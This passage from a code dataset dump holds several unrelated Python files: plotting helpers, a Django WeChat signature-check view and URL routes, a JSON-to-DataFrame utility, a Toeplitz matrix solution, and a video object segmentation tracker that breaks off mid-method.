 for i in range(len(categories))]\n plt.figure(figsize=(10, 8), dpi= 80, facecolor='w', edgecolor='k')\n for i, category in enumerate(categories):\n plt.scatter(x_col, y_col, \n data=df.loc[df[cate_col]==category, :], \n s=20, cmap=colors[i], label=str(category))\n\n plt.gca().set(xlabel=x_str, ylabel=y_str)\n plt.xticks(fontsize=12); plt.yticks(fontsize=12)\n title = title if title else \"Scatterplot of %s vs %s\" % (x_str, y_str)\n plt.title(title, fontsize=22)\n plt.legend(fontsize=12) \n plt.show()\n \ndef lmplot(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"\n Linear fit plot\n \"\"\"\n sns.set_style(\"white\")\n gridobj = sns.lmplot(x=x_col, y=y_col, hue=cate_col, data=df, \n height=7, aspect=1.6, robust=True, palette='tab10', \n scatter_kws=dict(s=60, linewidths=.7, edgecolors='black'))\n title = title if title else \"Scatterplot with line of best fit\"\n plt.title(title, fontsize=20)\n plt.show()\n \ndef strip_plot(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"\n Strip plot (jitter plot)\n Often, multiple data points have exactly the same X and Y values, so the plotted points overlap and hide each other. \n To avoid this, jitter the data points slightly so that they can all be seen.\n \"\"\"\n fig, ax = plt.subplots(figsize=(10, 8), dpi=80)\n sns.stripplot(x=x_col, y=y_col, hue=cate_col, \n data=df, jitter=0.25, size=8, ax=ax, linewidth=.5)\n title = title if title else \"Use jittered plots to avoid overlapping of points\" \n plt.title(title, fontsize=22)\n plt.show()\n \ndef count_plot(df, x_col, y_col, title=None):\n \"\"\"\n Another way to avoid the overlap problem is to grow each point's size with the number of observations that fall on it. \n The larger the point, the higher the concentration of observations around it.\n \"\"\"\n df_counts = df.groupby([x_col, y_col]).size().reset_index(name='counts')\n fig, ax = plt.subplots(figsize=(16,10), dpi= 80) \n sns.stripplot(df_counts[x_col], df_counts[y_col], \n size=df_counts.counts*2, ax=ax)\n title = title if title else 'Counts Plot'\n plt.title(title, fontsize=22)\n plt.show() \n \ndef marginal_histogram(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"Marginal histogram\n Adds histograms along the X and Y axis variables. This is used to visualize the relationship between X and Y\n together with the univariate distributions of X and Y individually. This kind of plot is often used in exploratory data analysis (EDA).\n \"\"\"\n fig = plt.figure(figsize=(10, 8), dpi= 80)\n grid = plt.GridSpec(4, 4, hspace=0.5, wspace=0.2)\n ax_main = fig.add_subplot(grid[:-1, :-1])\n ax_right = fig.add_subplot(grid[:-1, -1], xticklabels=[], yticklabels=[])\n ax_bottom = fig.add_subplot(grid[-1, 0:-1], xticklabels=[], yticklabels=[])\n if cate_col:\n c = df[cate_col].astype('category').cat.codes\n else:\n c = None\n ax_main.scatter(x_col, y_col, c=c,\n alpha=.9, data=df, cmap=\"tab10\", edgecolors='gray', linewidths=.5)\n ax_bottom.hist(df[x_col], 40, histtype='stepfilled', \n orientation='vertical', color='deeppink')\n ax_bottom.invert_yaxis()\n ax_right.hist(df[y_col], 40, histtype='stepfilled',\n orientation='horizontal', color='deeppink')\n title = title if title else 'Scatterplot with Histograms %s vs %s' \\\n % (x_col, y_col)\n ax_main.set(title=title, xlabel=x_col, ylabel=y_col)\n ax_main.title.set_fontsize(20)\n for item in ([ax_main.xaxis.label, ax_main.yaxis.label] \\\n + ax_main.get_xticklabels() + ax_main.get_yticklabels()):\n item.set_fontsize(14)\n \n xlabels = ax_main.get_xticks().tolist()\n ax_main.set_xticklabels(xlabels)\n plt.show()\n\ndef marginal_boxplot(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"Marginal boxplot\n Serves a similar purpose to the marginal histogram. However, the boxplots help pinpoint the medians\n and the 25th and 75th percentiles of X and Y.\n \"\"\"\n fig = plt.figure(figsize=(10, 8), dpi= 80)\n grid = plt.GridSpec(4, 4, hspace=0.5, wspace=0.2)\n ax_main = fig.add_subplot(grid[:-1, :-1])\n ax_right = fig.add_subplot(grid[:-1, -1], xticklabels=[], yticklabels=[])\n ax_bottom = fig.add_subplot(grid[-1, 0:-1], xticklabels=[], yticklabels=[])\n
 if cate_col:\n c = df[cate_col].astype('category').cat.codes\n else:\n c = None\n ax_main.scatter(x_col, y_col, c=c, alpha=.9, data=df, \n cmap=\"Set1\", edgecolors='black', linewidths=.5)\n sns.boxplot(df[x_col], ax=ax_bottom, orient=\"h\")\n sns.boxplot(df[y_col], ax=ax_right, orient=\"v\")\n ax_bottom.set(xlabel='')\n ax_right.set(ylabel='')\n title = title if title else 'Scatterplot with Boxplots %s vs %s' \\\n % (x_col, y_col)\n ax_main.set(title=title, xlabel=x_col, ylabel=y_col)\n ax_main.title.set_fontsize(20)\n for item in ([ax_main.xaxis.label, ax_main.yaxis.label] \\\n + ax_main.get_xticklabels() + ax_main.get_yticklabels()):\n item.set_fontsize(14)\n plt.show() \n \ndef corr_plot(df, x_variables, title=None):\n \"\"\"Correlation coefficient heatmap\"\"\"\n plt.figure(figsize=(10,8), dpi= 80)\n sns.heatmap(df.corr(), xticklabels=df[x_variables].corr().columns, \n yticklabels=df.corr().columns, cmap='RdYlGn', center=0, annot=True)\n title = title if title else 'Correlogram of Variables'\n plt.title(title, fontsize=22)\n plt.xticks(fontsize=12)\n plt.yticks(fontsize=12)\n plt.show()\n \ndef pairplot(df, x_variables, cate_cols=None, title=None):\n \"\"\"Pair plot (scatterplot matrix)\n \"\"\"\n plt.figure(figsize=(10,8), dpi= 80)\n sns.pairplot(df, kind=\"scatter\", hue=cate_cols, \n plot_kws=dict(s=80, edgecolor=\"white\", linewidth=2.5))\n title = title if title else 'Pair Plot'\n plt.title(title, fontsize=22)\n plt.show()\n\ndef diverging_bar_plot(df, x_col, y_col, title=None):\n \"\"\"Diverging bar chart\n \"\"\"\n x_str_z = x_col + '_z'\n df[x_str_z] = (df[x_col] - df[x_col].mean()) / df[x_col].std()\n df['colors'] = np.where(df[x_str_z] < 0, 'green', 'red')\n df.sort_values(x_str_z, inplace=True)\n df.reset_index(inplace=True)\n plt.figure(figsize=(14,10), dpi= 80)\n plt.hlines(y=df.index, xmin=0, xmax=df[x_str_z], \n color=df['colors'], alpha=0.4, linewidth=5)\n plt.gca().set(ylabel='$Model$', xlabel=x_col)\n plt.yticks(df.index, df[y_col], fontsize=12)\n title = title if title else 'Diverging Bars of %s' % y_col\n plt.title(title, fontdict={'size':20})\n plt.grid(linestyle='--', alpha=0.5)\n plt.show()\n\ndef ordered_bar_chart(df, x_col, cate_col, title=None):\n \"\"\"\n Ordered bar chart\n \"\"\"\n df = df[[x_col, cate_col]].groupby(cate_col).agg({x_col: 'mean'})\n df.sort_values(x_col, inplace=True)\n df.reset_index(inplace=True)\n fig, ax = plt.subplots(figsize=(16,10), facecolor='white', dpi= 80)\n ax.vlines(x=df.index, ymin=0, ymax=df[x_col], \n color='firebrick', alpha=0.7, linewidth=20)\n for i, cty in enumerate(df[x_col]):\n ax.text(i, cty+0.1, round(cty, 1), horizontalalignment='center')\n title = title if title else \"Bar chart\"\n ax.set_title(title, fontdict={'size':22})\n ax.set(ylabel=cate_col, ylim=(0, df[x_col].max() + 0.8))\n plt.xticks(df.index, df[cate_col], rotation=60, \n horizontalalignment='right', fontsize=12)\n p1 = patches.Rectangle((.57, -0.005), width=.33, height=.13, \n alpha=.1, facecolor='green', transform=fig.transFigure)\n p2 = patches.Rectangle((.124, -0.005), width=.446, height=.13, \n alpha=.1, facecolor='red', transform=fig.transFigure)\n fig.add_artist(p1)\n fig.add_artist(p2)\n plt.show()\n\ndef lollipop_chart(df, x_col, cate_col, title=None): \n \"\"\"\n Lollipop chart, similar to a bar chart\n \"\"\"\n df = df[[x_col, cate_col]].groupby(cate_col).agg({x_col: 'mean'})\n df.sort_values(x_col, inplace=True)\n df.reset_index(inplace=True)\n df.rename(columns={x_col: 'x_col'}, inplace=True)\n fig, ax = plt.subplots(figsize=(12,8), dpi= 80)\n ax.vlines(x=df.index, ymin=0, ymax=df['x_col'], \n color='firebrick', alpha=0.7, linewidth=2)\n
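 # draw the lollipop heads as scatter markers on top of the stems\n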
 ax.scatter(x=df.index, y=df['x_col'], s=75, color='firebrick', alpha=0.7)\n title = title if title else \"Lollipop Chart\"\n ax.set_title(title, fontdict={'size':22})\n ax.set_ylabel(x_col)\n ax.set_xticks(df.index)\n ax.set_xticklabels(df[cate_col], rotation=60, \n fontdict={'horizontalalignment': 'right', 'size':12})\n ax.set_ylim(0, 30)\n for row in df.itertuples():\n ax.text(row.Index, row.x_col+.5, s=round(row.x_col, 2), \n horizontalalignment= 'center', verticalalignment='bottom', fontsize=14)\n plt.show()\n\ndef density_plot(df, x_col, cate_col, title=None):\n \"\"\"\n Density curves\n \"\"\"\n plt.figure(figsize=(10,8), dpi= 80)\n categories = df[cate_col].unique()\n for i, category in enumerate(categories):\n data = df[df[cate_col] == category]\n sns.kdeplot(data[x_col], shade=True, label=\"{}={}\".format(cate_col, category), alpha=.7)\n title = title if title else \"Density Plot\"\n plt.title(title, fontsize=22)\n plt.legend()\n plt.show() \n\ndef density_histogram_plot(df, x_col, cate_col, title=None):\n \"\"\"\n Density plot with histogram\n \"\"\"\n plt.figure(figsize=(10,8), dpi= 80)\n categories = df[cate_col].unique()\n for i, category in enumerate(categories):\n data = df[df[cate_col] == category]\n sns.distplot(data[x_col], label=category, hist_kws={'alpha':.7}, kde_kws={'linewidth':3})\n title = title if title else \"Density Histogram Plot\" \n plt.title(title, fontsize=22)\n plt.legend()\n plt.show()\n\ndef population_pyramid(df, x_col, y_col, cate_col, title=None):\n \"\"\"\n Population pyramid; example cate_col: Gender\n \"\"\"\n plt.figure(figsize=(10,8), dpi=80)\n order_of_bars = df[y_col].unique()[::-1]\n colors = [plt.cm.Spectral(i/float(len(df[cate_col].unique())-1)) for i in range(len(df[cate_col].unique()))]\n \n for c, group in zip(colors, df[cate_col].unique()):\n sns.barplot(x=x_col, y=y_col, data=df.loc[df[cate_col]==group, :], order=order_of_bars, color=c, label=group)\n \n # Decorations \n plt.xlabel(\"${}$\".format(x_col))\n plt.ylabel(y_col)\n plt.yticks(fontsize=12)\n title = title if title else \"Population Pyramid \"\n plt.title(title, fontsize=22)\n plt.legend()\n plt.show()\n \ndef pie_chart(df, cate_col, title=None):\n \"\"\"\n Pie chart\n \"\"\"\n df = df.groupby(cate_col).size()\n df.plot(kind='pie', subplots=True, figsize=(8, 8))\n title = title if title else \"Pie Chart\"\n plt.title(title)\n plt.ylabel(\"\")\n plt.show()","repo_name":"liangjingwei/data_analysis","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":11512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74286714632","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport hashlib\n\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\n\nfrom zeus.controller.BusinessController import BusinessController\n\nlogger = logging.getLogger(\"django.request\")\n\n\n# Django enables CSRF protection by default; @csrf_exempt disables it for this view\n@csrf_exempt\ndef token(request):\n logger.debug(request.get_full_path())\n if request.method == \"GET\":\n # receive the parameters sent by the WeChat server in the GET request\n signature = request.GET.get('signature', None)\n timestamp = request.GET.get('timestamp', None)\n nonce = request.GET.get('nonce', None)\n echostr = request.GET.get('echostr', None)\n # the token from the server configuration\n token = 'weixin'\n # put the parameters in a list, sort them, and join them into one string\n hash_list = [token, timestamp, nonce]\n hash_list.sort()\n hash_str = ''.join([s for s in hash_list])\n
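 # SHA-1 the joined string; if the digest equals the signature sent by WeChat, the check passes and echostr is returned\n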
 hash_str = hashlib.sha1(hash_str.encode()).hexdigest()\n if hash_str == signature:\n return HttpResponse(echostr)\n else:\n return HttpResponse(\"failed\")\n else:\n body = request.body\n logger.debug(\n '''\n =========REQUEST========= \n %s\n =========================\n ''' % body.decode(\"utf-8\")\n )\n other_content = BusinessController().auto_reply(body)\n logger.debug(\n '''\n =========RESPONSE========\n %s\n =========================\n ''' % other_content\n )\n return HttpResponse(other_content)\n","repo_name":"flyliufu/PythonDemo","sub_path":"zeus/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8333241325","text":"import pandas as pd\n\n\nfrom preprocess.obj_to_df.obj_to_df_single import obj_to_df_single\n\n\ndef obj_to_df_multi(json_file):\n lst_lst = []\n new_json_file = []\n\n key_dict = ''\n for obj in json_file:\n for key in obj:\n if type(obj[key]) == dict:\n key_dict = key\n break\n\n curr_id = 0\n for obj in json_file:\n new_json = obj[key_dict]\n new_json['_id_'] = curr_id\n obj[key_dict] = curr_id\n new_json_file.append(new_json)\n curr_id += 1\n\n data = [\n obj_to_df_single(json_file),\n obj_to_df_single(new_json_file)\n ]\n\n return data\n","repo_name":"theketan26/da-tool","sub_path":"preprocess/obj_to_df/obj_to_df_multi.py","file_name":"obj_to_df_multi.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3970766208","text":"from typing import List\n\n\nclass Solution:\n def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:\n checker = {}\n for row in range(len(matrix)):\n for col in range(len(matrix[0])):\n number = matrix[row][col]\n difference = row - col\n if difference in checker:\n if checker[difference] != number:\n return False\n else:\n checker[difference] = number\n\n return True\n","repo_name":"aklileseyoum/A2SV","sub_path":"Toeplitz_matrix.py","file_name":"Toeplitz_matrix.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11313723580","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"measuring-request-form\"),\n path(\"measuringdatapart/\", views.getdatapart, name=\"measuring-data-part\"),\n path(\"measuringdatamaterial/\", views.getmaterial, name=\"measuring-data-part\"),\n path(\"applicantsandrecipients/\", views.getEmployees, name=\"applicantsandrecipients\"),\n path(\"insertemployees/\", views.insertEmployees, name=\"insert-employees\"),\n path(\"save-measuring-request-form/\", views.saveRequestMeasuringForm, name=\"save-measuring\"),\n path(\"view-email/\", views.viewEmail, name=\"view-email\"),\n path(\"/\", views.addSignature, name=\"edit-measuring\"),\n path(\"update-measuring-request-form-spv//\", views.updateMeasuringFromSpv, name=\"update-measuring-from-spv\"),\n path(\"update-measuring-request-form-staff-lab//\", views.updateMeasuringFromStaffLab, name=\"update-measuring-from-staff-lab\"),\n path(\"update-measuring-request-form-spv-lab//\", views.updateMeasuringFromSpvLab, name=\"update-measuring-from-spv-lab\"),\n path(\"create-notif/\", views.createNotification, name=\"create-notification\"),\n]","repo_name":"juandelima/Quality-Assurance-Lab---Django","sub_path":"measuring_request_form/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73111180231","text":"import torch\nfrom torch import nn\nimport numpy as np\nfrom torch.nn.modules.utils import _pair\nfrom davos.lib import TensorList\nfrom davos.eval.lib.preprocessing import sample_patch_multiscale, sample_patch_transformed, sample_patch\nfrom collections import OrderedDict as odict\n# noinspection PyUnresolvedReferences\nfrom davos.lib.debug import DebugVis\nfrom .common import Frame, uncrop, Memory, SpatialTracker\n\n\ndef get_tracker_class():\n return DLWL\n\nwarn_distractors_disabled = True\n\nclass DLWL(nn.Module):\n\n def __init__(self, object_id, params):\n super().__init__()\n self.params = params\n self.update_distractors = eval(\"self.\" + getattr(params, 'update_distractor_fn', 'update_distractors_wta'))\n self.ignore_distractors = getattr(params, 'ignore_distractors', False)\n\n self.object_id = object_id\n self.net = self.params.net\n self.device = next(self.net.parameters()).device\n self.spatial_tracker = SpatialTracker(params)\n self.memory = Memory(params)\n\n\n def make_distractors(self, labels, object_id, prev_distractors=None, disable=False):\n\n fg = (labels == object_id)\n\n if not disable:\n pdt = (prev_distractors.squeeze() != 0) if prev_distractors is not None else False\n dt = ~fg & ((labels != 0) | pdt)\n else:\n dt = torch.zeros_like(fg, dtype=torch.bool)\n\n m = torch.stack([fg, dt])\n m = m.view(-1, *m.shape[-3:]).float()\n\n return m\n\n def initialize(self, frame: Frame, prev_frame, bbox=None):\n\n self.cached_object_ids = None\n self.frame_num = 1\n\n # Set up mask and distractors\n prev_dt = prev_frame.segmentation.get(self.object_id, None) if prev_frame is not None else None\n mask = self.make_distractors(frame.labels, self.object_id, prev_dt, disable=self.ignore_distractors)\n frame.segmentation[self.object_id] = mask.squeeze(0)\n\n # Initialize target position and size\n self.spatial_tracker.initialize(bbox)\n\n # Initialize target model\n im = frame.image.unsqueeze(0).float()\n im_patches, feat_bbone, masks = self.generate_init_samples(im, mask)\n masks = masks.unsqueeze(1) # Add seq dim\n self.init_target_model(feat_bbone, masks)\n\n return frame\n\n def track(self, frame, 
prev_frame):\n self.debug_info = {}\n\n tg_channel = 0\n\n assert self.object_id is not None\n obj_id = self.object_id\n\n self.frame_num += 1\n self.debug_info['frame_num'] = self.frame_num\n\n # Obtain the merged segmentation prediction for the previous frames.\n # This is used to update the target model and determine the search\n # region for the current frame\n im = frame.image.unsqueeze(0).float()\n prev_seg_prob = prev_frame.segmentation_raw[obj_id]\n\n # Update the target model with merged masks and data from the previous frame\n skip_update = False\n if self.frame_num > 2:\n if self.params.get('update_target_model', True):\n\n # Crop the segmentation mask for the previous search area\n prev_seg_prob_crop, _ = sample_patch(\n prev_seg_prob, self.prev_pos, self.prev_scale * self.prev_im_size, self.prev_im_size,\n mode=self.params.get('border_mode', 'replicate'), max_scale_change=self.params.get('patch_max_scale_change'),\n is_mask=True) # is_mask=True disables replication padding\n\n #bb = self.spatial_tracker.get_target_bbox(prev_seg_prob_crop[0,0], tlhw=True)\n # nnn = (prev_seg_prob[0,0] > 0.5).sum().item()\n # print(nnn)\n # if nnn < 8000:\n # skip_update = True\n\n # Update the target model\n if not skip_update:\n self.update_target_model(self.prev_feat_tm, prev_seg_prob_crop.clone())\n\n # Estimate target bbox\n tg_prob = prev_seg_prob[0, 0] # Extract from first score channel\n if not skip_update:\n self.spatial_tracker.update_target_bbox_estimate(tg_prob)\n\n # Predict segmentation for the current frame\n\n # Get image patches and extract features\n pos, scale, im_size = self.spatial_tracker.get_centered_sample_pos() # From target bbox estimate\n sample_coords, im_patches = self.extract_patches(im, pos, scale, im_size)\n feat_bbone = self.extract_backbone_features(im_patches)\n feat_tm = self.extract_target_model_features(feat_bbone)\n\n # Save data for merging, for the next frame update\n self.prev_pos, self.prev_scale, self.prev_im_size = self.spatial_tracker.get_centered_sample_pos()\n sample_pos, sample_scale = self.spatial_tracker.get_sample_location(sample_coords)\n self.prev_feat_tm = feat_tm\n\n # Segment the target\n seg_scores, mask_enc_pred = self.segment_target(feat_tm, feat_bbone, im_patches.shape[-2:], get_mask_enc=True) # Raw scores, logits\n seg_scores = uncrop(seg_scores, sample_pos, sample_scale, im.shape[-2:], outside_value=-100.0) # Uncrop to full image\n\n seg_prob = torch.sigmoid(seg_scores) # Probability of being target/distractor at each pixel\n seg_mask = (seg_prob > 0.5).float() # Binary segmentation mask\n\n # Get target box from the predicted segmentation\n tg_prob = seg_prob[0] # Extract from first score channel\n new_bbox = torch.cat(self.spatial_tracker.get_target_bbox(tg_prob, tlhw=True))\n\n if hasattr(self, 'vis'):\n self.vis.imshow(im, \"image\")\n m = seg_mask\n im = torch.stack((m[1], m[0], torch.zeros_like(m[0])), dim=-3)\n self.vis.imshow(im, \"mask (green), distractor (red)\")\n self.vis.show_rawseg(seg_scores[0], title=\"predicted target\")\n self.vis.show_rawseg(seg_scores[1], title=\"predicted distractors\")\n self.vis.show_enclb(mask_enc_pred, title=\"predicted encoded mask\")\n pass\n\n assert self.object_id is not None # Multi-object mode\n\n # Save output\n\n frame.segmentation[obj_id] = seg_mask.view(*seg_mask.shape[-3:]).cpu()\n frame.target_bbox[obj_id] = new_bbox.tolist()\n frame.segmentation_raw[obj_id] = seg_scores.cpu()\n\n return frame\n\n def update_distractors_wta_clean(self, L, S, I):\n \"\"\"\n :param L: Label map 
(byte-image with object ids)\n :param S: Target segmentation probabilities (0.0 - 1.0)\n :param I: List of object ids, matching order in S\n \"\"\"\n\n p_max = S.max(dim=0, keepdim=True).values\n p_min = S.min(dim=0, keepdim=True).values\n\n D = []\n If = (L != 0).float()\n for k, i in enumerate(I):\n Id = (L != i).float() * If\n d_i = Id * p_max + (1 - If) * p_min\n D.append(d_i)\n\n return D\n\n def update_distractors_passthrough(self, object_ids, seg_probs: torch.Tensor, dis_scores: torch.Tensor, merged_labels):\n return dis_scores\n\n def update_distractors_zero(self, object_ids, seg_probs: torch.Tensor, dis_scores: torch.Tensor, merged_labels):\n return torch.zeros_like(dis_scores)\n\n def update_distractors_wta(self, object_ids, seg_probs: torch.Tensor, dis_scores: torch.Tensor, merged_labels):\n \"\"\" Generate distractors with a winner-takes-all approach.\n\n For target i, let the distractors be max(seg_scores[j]) for all j != i,\n in the area marked as occupied by any target in merged_labels.\n The distractor background will be min(seg_scores[k]) for all k,\n in the area marked as background in merged_labels.\n\n :param object_ids: List of object ids, WITHOUT the background\n :param seg_probs: Target segmentation probabilities (0.0 - 1.0), INCLUDING the background in [...,0,:,:]\n :param dis_scores: Distractor scores, (0.0 - 1.0) INCLUDING the background in [...,0,:,:]\n :param merged_labels: Label map (byte-image with object ids)\n \"\"\"\n if dis_scores is None:\n return None\n\n dt_probs = torch.zeros_like(seg_probs)\n if self.ignore_distractors:\n global warn_distractors_disabled\n if warn_distractors_disabled:\n print(\"distractors are disabled\")\n warn_distractors_disabled = False\n return dt_probs\n\n lb = torch.from_numpy(merged_labels).to(seg_probs.device)\n fg = (lb != 0)\n bg = (~fg).float()\n\n max_prob = seg_probs[1:].max(dim=0, keepdim=True).values\n min_prob = seg_probs[1:].min(dim=0, keepdim=True).values\n\n for i, obj_id in enumerate(object_ids):\n dt = ((lb != int(obj_id)) & fg).unsqueeze(0).float() # Distractor mask\n dt_probs[i+1] = max_prob * dt + min_prob * bg\n\n return dt_probs\n\n def _merge_sigmoid(self, object_ids, seg_scores):\n\n seg_scores, dis_scores = torch.split(seg_scores, 1, dim=-3)\n\n # Obtain seg. probability and scores for background label\n eps = 1e-7\n seg_prob = torch.sigmoid(seg_scores)\n bg_prob = torch.prod(1 - seg_prob, dim=0, keepdim=True).clamp(eps, 1.0 - eps)\n bg_score = (bg_prob / (1.0 - bg_prob)).log()\n\n seg_scores_all = torch.cat((bg_score, seg_scores), dim=0)\n out = []\n for s in seg_scores_all:\n s_out = 1.0 / (seg_scores_all - s.unsqueeze(0)).exp().sum(dim=0)\n out.append(s_out)\n seg_probs_all = torch.stack(out, dim=0)\n\n dis_probs_all = torch.sigmoid(torch.cat((bg_score, dis_scores), dim=0))\n\n # Obtain segmentation labels\n obj_ids_all = np.array([0, *map(int, object_ids)], dtype=np.uint8)\n merged_labels = obj_ids_all[seg_probs_all.argmax(dim=0).cpu()]\n\n # Update distractors and re-join target and distractor segments\n dis_probs_all = self.update_distractors(object_ids, seg_probs_all, dis_probs_all, merged_labels)\n raw_segs = odict()\n for i, obj_id in enumerate(object_ids):\n raw_segs[obj_id] = torch.cat((seg_probs_all[i + 1], dis_probs_all[i + 1]), dim=-3).cpu()\n\n return merged_labels, raw_segs\n\n def merge(self, frame, targets):\n \"\"\" Merges the predictions of individual targets. Note: Use this as a static method ...
\"\"\"\n\n tg_channel = 0\n\n object_ids = list(frame.segmentation.keys())\n\n fg = None # All foreground objects - a 0/1 mask\n for target in frame.segmentation.values():\n tg = target[tg_channel].cpu()\n if not torch.is_tensor(tg):\n tg = torch.from_numpy(tg)\n if fg is None:\n fg = tg\n else:\n fg = torch.max(tg, fg)\n\n # Merge segmentation scores using the soft-aggregation approach from RGMP\n\n # Collect segmentation scores\n seg_scores = []\n for obj_id in object_ids:\n if obj_id not in frame.segmentation_raw:\n # This is the first frame for this target\n\n # Get ground-truth target and generate distractor\n tg = frame.segmentation[obj_id][tg_channel].cpu()\n dt = fg * (1 - tg)\n # Convert to logits, i.e raw segmentations\n tg = (tg - 0.5) * 200.0 # (100 to target, -100 to background)\n dt = (dt - 0.5) * 200.0\n\n s = torch.stack((tg, dt))\n else:\n # Not the first frame for this target.\n s = frame.segmentation_raw[obj_id]\n\n seg_scores.append(s.reshape(1, *s.shape[-3:]))\n seg_scores = torch.stack(seg_scores).float()\n\n have_distractors = seg_scores.shape[-3] == 2\n assert have_distractors\n\n merged_labels, raw_segs = self._merge_sigmoid(object_ids, seg_scores)\n\n # Get target bounding boxes\n\n merged_boxes = {}\n for obj_id, seg_prob in raw_segs.items():\n merged_boxes[obj_id] = torch.cat(targets[obj_id].spatial_tracker.get_target_bbox(seg_prob, tlhw=True)).tolist()\n\n frame.labels = merged_labels\n frame.segmentation_raw = raw_segs\n frame.target_bbox = merged_boxes\n\n return frame\n\n # def uncrop(self, s_crop, sample_pos, sample_scale, im_size, outside_value=-100.0):\n # \"\"\" Obtain segmentation scores for the full image using the scores for the search region crop. This is done by\n # assigning a low score (outside_value=-100) for image regions outside the search region \"\"\"\n #\n # # Resize the segmentation scores to match the image scale\n # s = F.interpolate(s_crop, scale_factor=sample_scale.item(), mode='bilinear', align_corners=True, recompute_scale_factor=True)\n # (sc, sh, sw), dev = s.shape[-3:], s.device\n # s = s.view(*s.shape[-3:])\n #\n # # Regions outside search area get very low score\n # s_im = torch.ones((sc, *im_size), dtype=s.dtype, device=dev) * outside_value\n #\n # # Find the co-ordinates of the search region in the image scale\n # r1 = int(sample_pos[0].item() - 0.5*s.shape[-2])\n # c1 = int(sample_pos[1].item() - 0.5*s.shape[-1])\n #\n # r2 = r1 + s.shape[-2]\n # c2 = c1 + s.shape[-1]\n #\n # r1_pad = max(0, -r1)\n # c1_pad = max(0, -c1)\n #\n # r2_pad = max(r2 - im_size[-2], 0)\n # c2_pad = max(c2 - im_size[-1], 0)\n #\n # # Copy the scores for the search region\n # s_im[:, r1 + r1_pad:r2 - r2_pad, c1 + c1_pad:c2 - c2_pad] = s[:, r1_pad:sh - r2_pad, c1_pad:sw - c2_pad]\n #\n # return s_im\n\n def segment_target(self, feat_tm, feat_bbone, im_size, gt_mask=None, get_mask_enc=False):\n with torch.no_grad():\n segmentation_scores, mask_encoding_pred = self.net.segment_target(\n self.target_filter, feat_tm, feat_bbone, im_size, gt_mask=gt_mask)\n\n if get_mask_enc:\n return segmentation_scores, mask_encoding_pred\n return segmentation_scores\n\n def extract_patches(self, im: torch.Tensor, pos: torch.Tensor, scale, sz: torch.Tensor, gt_mask=None):\n im_patches, patch_coords = sample_patch_multiscale(im, pos, scale.unsqueeze(0), sz,\n mode=self.params.get('border_mode', 'replicate'),\n max_scale_change=self.params.get('patch_max_scale_change', None))\n if gt_mask is not None:\n gt_mask, _ = sample_patch_multiscale(gt_mask, pos, scale.unsqueeze(0), 
sz,\n mode=self.params.get('border_mode', 'replicate'),\n max_scale_change=self.params.get('patch_max_scale_change', None))\n return patch_coords[0], im_patches, gt_mask\n\n return patch_coords[0], im_patches\n\n def extract_backbone_features(self, im_patches):\n with torch.no_grad():\n return self.net.extract_backbone(im_patches)\n\n def extract_target_model_features(self, backbone_feat):\n \"\"\" Extract features input to the target model\"\"\"\n with torch.no_grad():\n return self.net.extract_target_model_features(backbone_feat)\n\n def generate_init_samples(self, im: torch.Tensor, init_mask):\n \"\"\" Generate initial training sample.\"\"\"\n\n # Locate the target\n pos, scale, size, transforms = self.spatial_tracker.generate_init_samples_params(im, init_mask)\n\n # Extract image patches\n im_patches = sample_patch_transformed(im, pos, scale, size, transforms)\n init_masks = sample_patch_transformed(init_mask, pos, scale, size, transforms, is_mask=True)\n init_masks = init_masks.to(self.device)\n self.transforms = transforms\n\n # Extract backbone features\n feat_bbone = self.extract_backbone_features(im_patches)\n\n return im_patches, feat_bbone, init_masks\n\n @staticmethod\n def _visualize_mask_enc(mask_enc):\n\n from davos.lib.debug import DebugVis\n vis = DebugVis()\n\n channels = list(range(0, 32))\n remove = [2, 4, 12, 14, 22, 23, 25, 26, 27, 28, 30, 31]\n for v in remove:\n channels.remove(v)\n c = mask_enc.squeeze()[channels]\n vis.show_enclb(c)\n\n\n\n def init_target_model(self, feat_bbone, masks):\n # Get target model features\n feat_tm = self.extract_target_model_features(feat_bbone)\n\n # Set sizes\n self.feature_sz = torch.Tensor(list(feat_tm.shape[-2:]))\n ksz = self.net.target_model.filter_size\n self.kernel_size = torch.Tensor(_pair(ksz))\n self.output_sz = self.feature_sz + (self.kernel_size + 1) % 2\n\n self.spatial_tracker.set_tm_params(self.kernel_size, self.feature_sz)\n\n # Set number of iterations\n num_iter = self.params.get('net_opt_iter', None)\n\n visualize = hasattr(self, 'vis')\n\n # Encode the masks and train the target model\n with torch.no_grad():\n mask_enc, mask_ws = self.net.label_encoder(masks, feat_tm.unsqueeze(1))\n self.target_filter, _, losses = self.net.target_model.get_filter(\n feat_tm.unsqueeze(1), mask_enc, mask_ws, num_iter=num_iter, compute_losses=visualize)\n\n if visualize:\n test_enc, test_pred = self.apply_target_model(\n feat_tm.unsqueeze(1), self.target_filter,\n decode=True, feat_bbone=feat_bbone, im_size=masks.shape[-2:]\n )\n self.vis.current_value_range = (-100, 100)\n self.vis.show_rawseg(test_pred[0, 0], title=\"predicted target\")\n self.vis.show_rawseg(test_pred[0, 1], title=\"predicted distractors\")\n self.vis.show_enclb(mask_enc, title=\"encoded training mask\")\n self.vis.show_enclb(test_enc, title=\"predicted encoded mask\")\n # self.vis.lineplot(torch.stack(losses), title=\"losses\")\n\n # Init memory\n if self.params.get('update_target_model', True):\n self.memory.initialize(TensorList([feat_tm]), 